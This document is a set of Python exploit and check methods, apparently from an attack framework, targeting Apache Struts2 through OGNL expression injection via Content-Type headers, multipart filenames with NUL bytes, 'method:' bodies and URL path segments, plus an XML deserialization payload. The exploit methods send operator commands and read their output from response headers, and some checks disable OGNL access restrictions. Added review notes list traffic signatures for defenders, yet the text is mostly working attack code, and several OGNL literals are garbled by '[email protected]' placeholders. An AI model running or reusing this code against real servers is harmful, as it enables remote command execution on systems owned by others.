Example #1
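 def exploit(self, cmd):
     """Send one POST with the generated payload as Content-Type and return the echo.

     The request carries ``self.payload(cmd)`` as the ``Content-Type``
     header, ``cmd`` base64-encoded in a non-standard ``x-ids`` header,
     and a short throwaway form body.

     Returns:
         ``'[*] <decoded x-ids response header>'`` on HTTP 200 when that
         header is present and decodes; the raw response text on HTTP 200
         when it is missing or undecodable; ``'[!] execute cmd error.'``
         for no response or any other status.

     Review notes:
         * A 200 response without the header returns the page body, so the
           caller cannot tell an unaffected server from a result. Treat
           that output as "no evidence".
         * Traffic signature for defenders: an ``x-ids`` request header and
           a Content-Type that is presumably not a media type
           (``self.payload`` is not shown here; confirm).
     """
     req = http.Http(self.options)
     headers = {
         'Content-Type': self.payload(cmd),
         'x-ids': base64.b64encode(cmd),
     }
     # Form body is filler; only its first letter varies between calls.
     xx = req.post(headers, random.choice('abcdefwx') + '1=123456')
     if xx is not None and xx.status_code == 200:
         try:
             x = base64.b64decode(xx.headers['x-ids'])
             return '[*] %s' % (x)
         except Exception:
             # Header absent or not base64: hand back the body unchanged.
             # Narrowed from a bare except so Ctrl-C / SystemExit propagate.
             return xx.text
     return '[!] execute cmd error.'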
Example #2
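 def exploit(self, cmd):
     """POST the URL-quoted payload in a ``pic`` form field and return the echo.

     The request is an ordinary ``application/x-www-form-urlencoded`` POST
     whose body is ``pic=<quoted self.payload(cmd)>``; ``cmd`` is also sent
     base64-encoded in a non-standard ``x-ids`` request header.

     Returns:
         ``'[*] <decoded x-ids response header>'`` on HTTP 200 when that
         header is present and decodes; the raw response text on HTTP 200
         otherwise; ``'[!] execute cmd error.'`` for no response or any
         other status.

     Review notes:
         * The body fallback means a normal 200 page from an unaffected
           server is returned as if it were output; callers should not
           treat it as confirmation.
         * Traffic signature for defenders: the ``x-ids`` header on the
           request and, per the read below, on the response.
     """
     req = http.Http(self.options)
     headers = {
         'Content-Type': 'application/x-www-form-urlencoded',
         'x-ids': base64.b64encode(cmd),
     }
     body = 'pic=' + quote(self.payload(cmd))
     xx = req.post(headers, body)
     if xx is not None and xx.status_code == 200:
         try:
             x = base64.b64decode(xx.headers['x-ids'])
             return '[*] %s' % (x)
         except Exception:
             # Header absent or not base64: hand back the body unchanged.
             # Narrowed from a bare except so Ctrl-C / SystemExit propagate.
             return xx.text
     return '[!] execute cmd error.'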
Example #3
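    def check(self):
        """Probe whether an expression placed in the ``pic`` form field is evaluated.

        The expression below only asks the server to add a response header
        ``x-ids: x123#`` and close the response writer. The target is
        reported as affected only when the reply is HTTP 200 and that exact
        header value comes back.

        Returns:
            True when the marker header is echoed, False in every other
            case, including no response and any error while reading it.

        Review notes:
            * ``x-ids`` and ``x123#`` are fixed strings, so this probe's
              traffic is easy to match in proxy or WAF logs.
            * False covers network and parsing failures too; it is "not
              confirmed", not proof that the server is patched.
        """
        req = http.Http(self.options)
        # Backslash-newlines inside the literal are continuations: the
        # value is a single line with no embedded newlines.
        a = '''\
(#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].addHeader('x-ids','x123#')).\
(#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].getWriter().close())\
'''
        xx = req.post({'Content-Type': 'application/x-www-form-urlencoded'},
                      'pic=' + quote('%{' + a + '}'))
        try:
            return (xx is not None and xx.status_code == 200
                    and xx.headers['x-ids'] == 'x123#')
        except Exception:
            # Missing header (or an unexpected response object) counts as
            # "not confirmed". Narrowed from a bare except so Ctrl-C and
            # SystemExit are no longer swallowed.
            return False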
Example #4
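 def exploit(self, cmd):
     """POST a hand-built multipart body whose filename carries the payload.

     The body template holds one form part named ``x``; its ``filename``
     value is ``self.payload(cmd)`` followed by a NUL byte and ``x``.
     ``cmd`` is also sent base64-encoded in a non-standard ``x-ids``
     request header.

     Returns:
         ``'[*] <decoded x-ids response header>'`` on HTTP 200 when that
         header is present and decodes; the raw response text on HTTP 200
         otherwise; ``'[!] execute cmd error.'`` for no response or any
         other status.

     Review notes:
         * The body fallback returns an ordinary 200 page as if it were
           output; callers should not treat it as confirmation.
         * Traffic signature for defenders: a multipart ``filename``
           containing a NUL byte, the fixed boundary ``--------6105``, and
           the ``x-ids`` header.
     """
     req = http.Http(self.options)
     # Delimiter lines are "--" + boundary, hence two more dashes here than
     # in the Content-Type header below.
     aa = "----------6105\x0d\x0aContent-Disposition:form-data;name=\"x\";filename=\"%s\x00x\"\x0d\x0a\x0d\x0a\x0d\x0a----------6105--\x0d\x0a"
     headers = {
         'Content-Type': 'multipart/form-data;boundary=--------6105',
         'x-ids': base64.b64encode(cmd),
     }
     xx = req.post(headers, aa % (self.payload(cmd)))
     if xx is not None and xx.status_code == 200:
         try:
             x = base64.b64decode(xx.headers['x-ids'])
             return '[*] %s' % (x)
         except Exception:
             # Header absent or not base64: hand back the body unchanged.
             # Narrowed from a bare except so Ctrl-C / SystemExit propagate.
             return xx.text
     return '[!] execute cmd error.'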
Example #5
    def check(self):
        """Probe by sending an expression as the ``Content-Type`` request header.

        The expression text clears the excluded package and class lists
        obtained through ``OgnlUtil`` and then adds a response header
        ``x-ids: x123#``. The method returns True only when the reply is
        HTTP 200 and carries exactly that header value; every other outcome,
        including any exception, returns False.

        Review notes:
            * ``x-ids`` / ``x123#`` are fixed strings, and a Content-Type
              that starts with ``%{`` is not a media type. Both are
              straightforward to match in proxy or WAF logs.
            * False also covers transport and parsing failures, so it means
              "not confirmed" rather than "patched".
        """
        req=http.Http(self.options)
        # NOTE(review): the "[email protected]" token in the second line of
        # this literal is the placeholder that e-mail-obfuscating page filters
        # leave behind, so the literal as shown is presumably not what the
        # author wrote. Read this listing as illustrative, not as the
        # original source.
        # Backslash-newlines inside the literal are continuations: the value
        # is a single line.
        a='''\
("multipart/form-data").\
(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#x):(\
(#xx=#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.Act'+'ionCont'+'ext.co'+'nta'+'iner'].getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\
(#xx.getExcludedPackageNames().clear()).(#xx.getExcludedClasses().clear()).(#context.setMemberAccess(#x)))).\
(#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].addHeader('x-ids','x123#'))\
'''
        # The form body is filler; the expression travels in the header.
        xx=req.post({'Content-Type':'%{'+a+'}'},random.choice('abcdefwx')+'1=123456')
        try:
            if xx!=None and xx.status_code==200 and xx.headers['x-ids']=='x123#':
                return True
            return False
        # NOTE(review): the bare except also hides KeyboardInterrupt and
        # SystemExit; a missing header (KeyError) is the expected case.
        except:
            return False
Example #6
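 def exploit(self, cmd):
     """POST a ``method:``-prefixed expression and read the result from header ``1``.

     ``self.payload(cmd)`` returns a pair ``(p, c)``: ``p`` is URL-quoted
     and sent as the form body after the literal prefix ``method:``. ``c``,
     a servlet-response class name and the string ``utf-8`` are sent
     base64-encoded in request headers named ``2``, ``1`` and ``3``.

     Returns:
         ``'[*] <decoded response header 1>'`` on HTTP 200 when that header
         is present and decodes; the raw response text on HTTP 200
         otherwise; ``'[!] execute cmd error.'`` for no response or any
         other status.

     Review notes:
         * The body fallback returns an ordinary 200 page as if it were
           output; callers should not treat it as confirmation.
         * Traffic signature for defenders: request headers literally named
           ``1``, ``2``, ``3`` with base64 values, and a form body starting
           with ``method:``.
         * ``b64encode`` is given ``str`` literals, which only works on
           Python 2.
     """
     req = http.Http(self.options)
     p, c = self.payload(cmd)
     a = base64.b64encode(
         'com.opensymphony.xwork2.dispatcher.HttpServletResponse')
     headers = {
         'Content-Type': 'application/x-www-form-urlencoded',
         '1': a,
         '2': base64.b64encode(c),
         '3': base64.b64encode('utf-8'),
     }
     xx = req.post(headers, 'method:' + quote(p))
     if xx is not None and xx.status_code == 200:
         try:
             x = base64.b64decode(xx.headers['1'])
             return '[*] %s' % (x)
         except Exception:
             # Header absent or not base64: hand back the body unchanged.
             # Narrowed from a bare except so Ctrl-C / SystemExit propagate.
             return xx.text
     return '[!] execute cmd error.'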
Example #7
    def check(self):
        """Probe by sending an expression as the ``filename`` of a multipart part.

        The expression text clears the excluded package and class lists
        obtained through ``OgnlUtil`` and then adds a response header
        ``x-ids: x123#``. It is wrapped in ``%{...}`` and substituted into a
        hand-built multipart body, where it is followed by a NUL byte. The
        method returns True only when the reply is HTTP 200 and carries
        exactly that header value; every other outcome, including any
        exception, returns False.

        Review notes:
            * Traffic signature for defenders: a multipart ``filename``
              containing ``%{`` and a NUL byte, the fixed boundary
              ``--------6105``, and the ``x-ids: x123#`` response header.
            * False also covers transport and parsing failures, so it means
              "not confirmed" rather than "patched".
        """
        req = http.Http(self.options)
        # NOTE(review): the "[email protected]" token in the first line of
        # this literal is the placeholder that e-mail-obfuscating page filters
        # leave behind, so the literal as shown is presumably not what the
        # author wrote. Read this listing as illustrative, not as the
        # original source.
        # Backslash-newlines inside the literal are continuations: the value
        # is a single line.
        a = '''\
(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#x):(\
(#xx=#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.Act'+'ionCont'+'ext.co'+'nta'+'iner'].getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\
(#xx.getExcludedPackageNames().clear()).(#xx.getExcludedClasses().clear()).(#context.setMemberAccess(#x)))).\
(#context['co'+'m.ope'+'nsymph'+'ony.xwo'+'rk2.disp'+'atcher.Htt'+'pSe'+'rvletRe'+'sponse'].addHeader('x-ids','x123#'))\
'''
        # Delimiter lines are "--" + boundary, hence two more dashes here
        # than in the Content-Type header below.
        aa = "----------6105\x0d\x0aContent-Disposition:form-data;name=\"x\";filename=\"%s\x00x\"\x0d\x0a\x0d\x0a\x0d\x0a----------6105--\x0d\x0a"
        xx = req.post(
            {'Content-Type': 'multipart/form-data;boundary=--------6105'},
            aa % ('%{' + a + '}'))
        try:
            if xx != None and xx.status_code == 200 and xx.headers[
                    'x-ids'] == 'x123#':
                return True
            return False
        # NOTE(review): the bare except also hides KeyboardInterrupt and
        # SystemExit; a missing header (KeyError) is the expected case.
        except:
            return False
Example #8
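 def exploit(self, cmd):
     """GET a URL whose last path segment is the expression; read header ``1``.

     ``self.payload(cmd)`` returns a pair ``(p, c)``: ``p`` is URL-quoted
     and appended to the client's URL as an extra path segment. ``c``, a
     servlet-response class name and the string ``utf-8`` are sent
     base64-encoded in request headers named ``2``, ``1`` and ``3``.

     Returns:
         ``'[*] <decoded response header 1>'`` on HTTP 200 when that header
         is present and decodes; the raw response text on HTTP 200
         otherwise; ``'[!] execute cmd error.'`` for no response or any
         other status.

     Review notes:
         * The body fallback returns an ordinary 200 page as if it were
           output; callers should not treat it as confirmation.
         * Traffic signature for defenders: request headers literally named
           ``1``, ``2``, ``3`` with base64 values, plus a long URL-encoded
           final path segment.
         * ``b64encode`` is given ``str`` literals, which only works on
           Python 2.
     """
     # A fresh client is built per call, so the URL edit below does not
     # accumulate across calls.
     req = http.Http(self.options)
     p, c = self.payload(cmd)
     req.url = req.url + '/' + quote(p)
     headers = {
         '1': base64.b64encode(
             'com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
         '2': base64.b64encode(c),
         '3': base64.b64encode('utf-8'),
     }
     xx = req.get(headers)
     if xx is not None and xx.status_code == 200:
         try:
             x = base64.b64decode(xx.headers['1'])
             return '[*] %s' % (x)
         except Exception:
             # Header absent or not base64: hand back the body unchanged.
             # Narrowed from a bare except so Ctrl-C / SystemExit propagate.
             return xx.text
     return '[!] execute cmd error.'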
Example #9
    def check(self):
        """Probe with a ``method:``-prefixed expression and record the reported OS.

        The expression reads two request parameters whose names are chosen
        below (random letter + ``1`` / ``2``). The first names a
        servlet-response class and the second the Java system property
        ``os.name``. It asks the server to return that property in a
        response header named ``1``.

        Returns True when the reply is HTTP 200 and header ``1`` is
        non-empty, False otherwise, including on any exception.

        Side effect: on success the header value is stored in
        ``self.options['OS']['Value']``.

        Review notes:
            * Traffic signature for defenders: a form body starting with
              ``method:`` and a response header literally named ``1``.
            * False also covers transport and parsing failures, so it means
              "not confirmed" rather than "patched".
        """
        req = http.Http(self.options)
        # NOTE(review): the "[email protected]" token in the first line of
        # this literal is the placeholder that e-mail-obfuscating page filters
        # leave behind, so the literal as shown is presumably not what the
        # author wrote. Read this listing as illustrative, not as the
        # original source.
        # The two %s slots receive the parameter names a1 and a2.
        a = '''\
(#[email protected]@DEFAULT_MEMBER_ACCESS).\
(#x=#parameters.%s[0],#context[#x].addHeader(1,@java.lang.System@getProperty(#parameters.%s[0]))).\
(#x=#context[#x].getWriter()).(#x.println(1),#x.flush(),#x.close())?x:x\
'''
        # The names always differ because they end in '1' and '2'.
        a1 = random.choice('abcdefwx') + '1'
        a2 = random.choice('abcdefwx') + '2'
        xx = req.post(
            {'Content-Type': 'application/x-www-form-urlencoded'},
            'method:' + quote(a % (a1, a2)) + '&' + a1 +
            '=com.opensymphony.xwork2.dispatcher.HttpServletResponse&' + a2 +
            '=os.name')
        try:
            if xx != None and xx.status_code == 200 and len(
                    xx.headers['1']) > 0:
                # Keep the reported OS name for later use via the options.
                self.options['OS']['Value'] = xx.headers['1']
                return True
            return False
        # NOTE(review): the bare except also hides KeyboardInterrupt and
        # SystemExit; a missing header or options key (KeyError) is the
        # expected case.
        except:
            return False
Example #10
 def exploit(self, cmd):
     """POST an XML document built from the escaped command; the reply is ignored.

     ``cmd`` is passed through ``cgi.escape`` (which escapes ``&``, ``<``
     and ``>`` but not quotes by default) before it is handed to
     ``self.payload``, and the result is sent with
     ``Content-Type: application/xml``.

     Returns:
         Always ``'[*] execute cmd finish.'``. The response is discarded,
         so the string only means the request was sent and says nothing
         about whether the server processed it.

     NOTE(review): ``cgi.escape`` is deprecated and absent from Python
     3.8+, so this block is Python 2 era code.
     """
     client = http.Http(self.options)
     xml_body = self.payload(cgi.escape(cmd))
     client.post({'Content-Type': 'application/xml'}, xml_body)
     return '[*] execute cmd finish.'
Example #11
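 def check(self):
     """Probe by posting the XML payload with an empty command and matching the error text.

     The target is reported as affected when the reply is HTTP 500 and its
     body contains the Java cast-exception message
     ``java.lang.String cannot be cast to java.security.Provider$Service``.

     Returns:
         True when both conditions hold, False otherwise (including when
         no response object was returned).

     Review notes:
         * The check depends on the server echoing exception text in its
           500 page. With custom or suppressed error pages it returns
           False regardless of patch level, so False is "not confirmed",
           not proof of a fix.
         * For defenders: that exception string in a 500 response to an
           ``application/xml`` POST is a useful log indicator, and
           verbose error pages should be disabled in production.
     """
     req = http.Http(self.options)
     xx = req.post({'Content-Type': 'application/xml'}, self.payload(''))
     marker = ('java.lang.String cannot be cast to '
               'java.security.Provider$Service')
     return (xx is not None and xx.status_code == 500
             and marker in xx.text)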